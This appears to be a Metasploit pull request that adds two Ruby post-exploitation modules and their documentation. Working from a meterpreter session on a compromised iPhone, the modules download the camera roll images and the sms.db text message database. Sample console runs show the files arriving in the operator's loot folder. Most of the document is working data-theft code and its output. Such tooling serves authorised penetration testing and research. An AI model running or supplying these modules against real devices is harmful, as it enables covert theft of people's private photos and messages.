### PR TITLE
Add post modules for collecting iOS images and texts

### DIFF
--- a/documentation/modules/post/apple_ios/gather/ios_image_gather.md
+++ b/documentation/modules/post/apple_ios/gather/ios_image_gather.md
@@ -1,0 +1,35 @@
+## Description
+
+  This module downloads the discovered images on iPhones
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a session
+  3. Do: ```use post/apple_ios/gather/ios_image_gather```
+  4. Do: ```set SESSION <session>```
+  5. Do: ```run```
+  6. You should get images from the iPhone target.
+
+## Scenarios
+
+### Tested on iOS 10.3.3 on an iPhone 5
+
+  ```
+
+  msf5 > use post/apple_ios/gather/ios_image_gather 
+  msf5 post(apple_ios/gather/ios_image_gather) > set session 1
+  session => 1
+  msf5 post(apple_ios/gather/ios_image_gather) > run
+
+  [!] SESSION may not be compatible with this module.
+  [+] Image path found. Will begin searching for images...
+  [*] Directory for iOS images: /Users/space/.msf4/loot/KlaBVw
+  [*] Downloading image: IMG_0001.JPG
+  [*] Downloading image: IMG_0002.JPG
+  [*] Downloading image: IMG_0003.JPG
+  [*] Downloading image: shell.php.jpg
+  [*] Post module execution completed
+
+
+  ```

--- a/documentation/modules/post/apple_ios/gather/ios_text_gather.md
+++ b/documentation/modules/post/apple_ios/gather/ios_text_gather.md
@@ -1,0 +1,31 @@
+## Description
+  
+  This module downloads the `sms.db` file from iPhones
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a session
+  3. Do: ```use post/apple_ios/gather/ios_text_gather```
+  4. Do: ```set SESSION <session>```
+  5. Do: ```run```
+  6. You should get the sms.db file on the iPhone target
+
+## Scenarios
+
+### Tested on iOS 10.3.3 on an iPhone 5
+
+  ```
+
+  msf5 > use post/apple_ios/gather/ios_text_gather
+  msf5 post(apple_ios/gather/ios_text_gather) > set session 1
+  session => 1
+  msf5 post(apple_ios/gather/ios_text_gather) > run
+
+  [!] SESSION may not be compatible with this module.
+  [+] sms.db file found
+  [+] sms.db stored at /Users/space/.msf4/loot/20181101154200_default_192.168.43.49_sms.db.file_591456.txt
+  [*] Post module execution completed
+
+
+  ```

--- a/modules/post/apple_ios/gather/img_text_gather.rb
+++ b/modules/post/apple_ios/gather/img_text_gather.rb
@@ -1,0 +1,24 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          =>  'Placeholder Name',
+      'Description'   =>  %q{
+        This is a placeholder description for the module.
+      },
+      'License'       =>  MSF_LICENSE,
+      'Author'        =>  [ 'Shelby Pace' ], # Metasploit Module
+      'Platform'      =>  [ 'apple_ios' ],
+      'SessionTypes'  =>  [ 'meterpreter' ]
+    ))
+  end
+
+  def run
+
+  end
+end

--- a/modules/post/apple_ios/gather/img_text_gather.rb
+++ b/modules/post/apple_ios/gather/img_text_gather.rb
@@ -4,12 +4,14 @@
 ##
 
 class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Auxiliary::Report
 
   def initialize(info={})
     super(update_info(info,
-      'Name'          =>  'Placeholder Name',
+      'Name'          =>  'iOS Image and Text Gatherer',
       'Description'   =>  %q{
-        This is a placeholder description for the module.
+        This module collects images and text messages from iPhones.
       },
       'License'       =>  MSF_LICENSE,
       'Author'        =>  [ 'Shelby Pace' ], # Metasploit Module
@@ -18,7 +20,48 @@ class MetasploitModule < Msf::Post
     ))
   end
 
-  def run
+  # location of images: /private/var/mobile/Media/DCIM/100APPLE
+  def check_for_img_path
+    directory?('/private/var/mobile/Media/DCIM/100APPLE')
+  end
 
+  def enum_img
+    img_path = '/private/var/mobile/Media/DCIM/100APPlE'
+    unless check_for_img_path
+      print_bad('Default image path not found')
+      return
+    end
+
+    print_good('Image path found. Will begin searching for images...')
+    ios_imgs = dir(img_path)
+    ios_imgs.each do |img|
+      begin
+        f = File.open("#{img_path}/#{img}")
+        data = File.read(f)
+        store_loot("ios_image", "image/jpg", session, data, img)
+        print_good("Stored #{img}")
+      rescue
+        print_bad('Failed to read and collect images')
+      end
+    end
+  end
+
+  # location of texts: /private/var/mobile/Library/SMS/sms.db
+  def check_for_sms
+    file?('/private/var/mobile/Library/SMS/sms.db')
+  end
+
+  def enum_text
+    unless check_for_sms
+      print_bad('No text messages found')
+      return
+    end
+
+    print_good('Text message file found')
+  end
+
+  def run
+    enum_img
+    enum_text
   end
 end

--- a/modules/post/apple_ios/gather/ios_image_gather.rb
+++ b/modules/post/apple_ios/gather/ios_image_gather.rb
@@ -27,41 +27,27 @@ class MetasploitModule < Msf::Post
 
   def enum_img
     img_path = '/private/var/mobile/Media/DCIM/100APPlE'
+    path = File.join(Msf::Config.loot_directory, Rex::Text.rand_text_alpha(6))
+    local_path = File.expand_path(path)
+
     unless check_for_img_path
       print_bad('Default image path not found')
       return
     end
 
+    opts = { "block_size" => 4000 }
     print_good('Image path found. Will begin searching for images...')
-    ios_imgs = dir(img_path)
+    cd('/private/var/mobile')
+    cd('Media/DCIM/100APPLE')
+    ios_imgs = dir(pwd)
+    print_status("Directory for iOS images: #{local_path}")
     ios_imgs.each do |img|
-      begin
-        f = File.open("#{img_path}/#{img}")
-        data = File.read(f)
-        store_loot("ios_image", "image/jpg", session, data, img)
-        print_good("Stored #{img}")
-      rescue
-        print_bad('Failed to read and collect images')
-      end
+      print_status("Downloading image: #{img}")
+      client.fs.file.download_file("#{local_path}/#{img}", "#{pwd}/#{img}", opts)
     end
-  end
-
-  # location of texts: /private/var/mobile/Library/SMS/sms.db
-  def check_for_sms
-    file?('/private/var/mobile/Library/SMS/sms.db')
-  end
-
-  def enum_text
-    unless check_for_sms
-      print_bad('No text messages found')
-      return
-    end
-
-    print_good('Text message file found')
   end
 
   def run
     enum_img
-    enum_text
   end
 end

--- a/modules/post/apple_ios/gather/ios_image_gather.rb
+++ b/modules/post/apple_ios/gather/ios_image_gather.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super(update_info(info,
-      'Name'          =>  'iOS Image and Text Gatherer',
+      'Name'          =>  'iOS Image Gatherer',
       'Description'   =>  %q{
         This module collects images and text messages from iPhones.
       },
@@ -26,7 +26,6 @@ class MetasploitModule < Msf::Post
   end
 
   def enum_img
-    img_path = '/private/var/mobile/Media/DCIM/100APPlE'
     path = File.join(Msf::Config.loot_directory, Rex::Text.rand_text_alpha(6))
     local_path = File.expand_path(path)
 
@@ -34,16 +33,20 @@ class MetasploitModule < Msf::Post
       print_bad('Default image path not found')
       return
     end
-
-    opts = { "block_size" => 4000 }
     print_good('Image path found. Will begin searching for images...')
-    cd('/private/var/mobile')
-    cd('Media/DCIM/100APPLE')
+
+    cd('/private/var/mobile/Media/DCIM/100APPLE')
     ios_imgs = dir(pwd)
     print_status("Directory for iOS images: #{local_path}")
+
+    opts = { "block_size" => 262144 }
     ios_imgs.each do |img|
-      print_status("Downloading image: #{img}")
-      client.fs.file.download_file("#{local_path}/#{img}", "#{pwd}/#{img}", opts)
+      begin
+        print_status("Downloading image: #{img}")
+        client.fs.file.download_file("#{local_path}/#{img}", "#{pwd}/#{img}", opts)
+      rescue
+        print_error("#{img} could not be downloaded")
+      end
     end
   end
 

--- a/modules/post/apple_ios/gather/ios_image_gather.rb
+++ b/modules/post/apple_ios/gather/ios_image_gather.rb
@@ -21,10 +21,6 @@ class MetasploitModule < Msf::Post
     ))
   end
 
-  def check_for_img_path(f_path)
-    directory?(f_path)
-  end
-
   def enum_img(f_path)
     path = File.join(Msf::Config.loot_directory, Rex::Text.rand_text_alpha(6))
     local_path = File.expand_path(path)
@@ -45,7 +41,7 @@ class MetasploitModule < Msf::Post
 
   def run
     img_path = '/private/var/mobile/Media/DCIM/100APPLE'
-    unless check_for_img_path(img_path)
+    unless directory?(img_path)
       fail_with(Failure::NotFound, "Could not find the default image file path")
     end
     print_good('Image path found. Will begin searching for images...')

--- a/modules/post/apple_ios/gather/ios_image_gather.rb
+++ b/modules/post/apple_ios/gather/ios_image_gather.rb
@@ -11,7 +11,8 @@ class MetasploitModule < Msf::Post
     super(update_info(info,
       'Name'          =>  'iOS Image Gatherer',
       'Description'   =>  %q{
-        This module collects images and text messages from iPhones.
+        This module collects images from iPhones.
+        Module was tested on iOS 10.3.3 on an iPhone 5.
       },
       'License'       =>  MSF_LICENSE,
       'Author'        =>  [ 'Shelby Pace' ], # Metasploit Module
@@ -20,23 +21,15 @@ class MetasploitModule < Msf::Post
     ))
   end
 
-  # location of images: /private/var/mobile/Media/DCIM/100APPLE
-  def check_for_img_path
-    directory?('/private/var/mobile/Media/DCIM/100APPLE')
+  def check_for_img_path(f_path)
+    directory?(f_path)
   end
 
-  def enum_img
+  def enum_img(f_path)
     path = File.join(Msf::Config.loot_directory, Rex::Text.rand_text_alpha(6))
     local_path = File.expand_path(path)
 
-    unless check_for_img_path
-      print_bad('Default image path not found')
-      return
-    end
-    print_good('Image path found. Will begin searching for images...')
-
-    cd('/private/var/mobile/Media/DCIM/100APPLE')
-    ios_imgs = dir(pwd)
+    ios_imgs = dir(f_path)
     print_status("Directory for iOS images: #{local_path}")
 
     opts = { "block_size" => 262144 }
@@ -51,6 +44,12 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    enum_img
+    img_path = '/private/var/mobile/Media/DCIM/100APPLE'
+    unless check_for_img_path(img_path)
+      fail_with(Failure::NotFound, "Could not find the default image file path")
+    end
+    print_good('Image path found. Will begin searching for images...')
+
+    enum_img(img_path)
   end
 end

--- a/modules/post/apple_ios/gather/ios_image_gather.rb
+++ b/modules/post/apple_ios/gather/ios_image_gather.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Post
     ios_imgs.each do |img|
       begin
         print_status("Downloading image: #{img}")
-        client.fs.file.download_file("#{local_path}/#{img}", "#{pwd}/#{img}", opts)
+        client.fs.file.download_file("#{local_path}/#{img}", "#{f_path}/#{img}", opts)
       rescue
         print_error("#{img} could not be downloaded")
       end

--- a/modules/post/apple_ios/gather/ios_text_gather.rb
+++ b/modules/post/apple_ios/gather/ios_text_gather.rb
@@ -11,7 +11,8 @@ class MetasploitModule < Msf::Post
     super(update_info(info,
       'Name'          =>  'iOS Text Gatherer',
       'Description'   =>  %q{
-        This module collects images and text messages from iPhones.
+        This module collects text messages from iPhones.
+        Tested on iOS 10.3.3 on an iPhone 5.
       },
       'License'       =>  MSF_LICENSE,
       'Author'        =>  [ 'Shelby Pace' ], # Metasploit Module
@@ -20,7 +21,25 @@ class MetasploitModule < Msf::Post
     ))
   end
 
-  def run
+  def check_for_sms_file(file_path)
+    file?(file_path)
+  end
 
+  def download_text_db(file_path)
+    db_file_data = read_file(file_path)
+    loc = store_loot('sms.db.file', 'text/plain', session, db_file_data, 'sms.db')
+    print_good("sms.db stored at #{loc}")
+    rescue
+      fail_with(Failure::NoAccess, "Failed to read sms.db file")
+  end
+
+  def run
+    sms_path = '/private/var/mobile/Library/SMS/sms.db'
+    unless check_for_sms_file(sms_path)
+      fail_with(Failure::NotFound, "Couldn't locate sms.db file")
+    end
+
+    print_good('sms.db file found')
+    download_text_db(sms_path)
   end
 end

--- a/modules/post/apple_ios/gather/ios_text_gather.rb
+++ b/modules/post/apple_ios/gather/ios_text_gather.rb
@@ -1,0 +1,26 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          =>  'iOS Text Gatherer',
+      'Description'   =>  %q{
+        This module collects images and text messages from iPhones.
+      },
+      'License'       =>  MSF_LICENSE,
+      'Author'        =>  [ 'Shelby Pace' ], # Metasploit Module
+      'Platform'      =>  [ 'apple_ios' ],
+      'SessionTypes'  =>  [ 'meterpreter' ]
+    ))
+  end
+
+  def run
+
+  end
+end

--- a/modules/post/apple_ios/gather/ios_text_gather.rb
+++ b/modules/post/apple_ios/gather/ios_text_gather.rb
@@ -21,21 +21,17 @@ class MetasploitModule < Msf::Post
     ))
   end
 
-  def check_for_sms_file(file_path)
-    file?(file_path)
-  end
-
   def download_text_db(file_path)
     db_file_data = read_file(file_path)
     loc = store_loot('sms.db.file', 'text/plain', session, db_file_data, 'sms.db')
     print_good("sms.db stored at #{loc}")
-    rescue
-      fail_with(Failure::NoAccess, "Failed to read sms.db file")
+  rescue
+    fail_with(Failure::NoAccess, "Failed to read sms.db file")
   end
 
   def run
     sms_path = '/private/var/mobile/Library/SMS/sms.db'
-    unless check_for_sms_file(sms_path)
+    unless file?(sms_path)
       fail_with(Failure::NotFound, "Couldn't locate sms.db file")
     end
 


### PR DESCRIPTION
This adds two Post modules that collect images and text messages from iOS devices. 

## Verification

For `ios_text_gather`:

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use post/apple_ios/gather/ios_text_gather`
- [x] `set SESSION <session>`
- [x] `run`
- [x] You should get the sms.db file on the iPhone target

For `ios_image_gather`:

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use post/apple_ios/gather/ios_image_gather`
- [x] `set SESSION <session>`
- [x] `run`
- [x] You should get images from the iPhone target.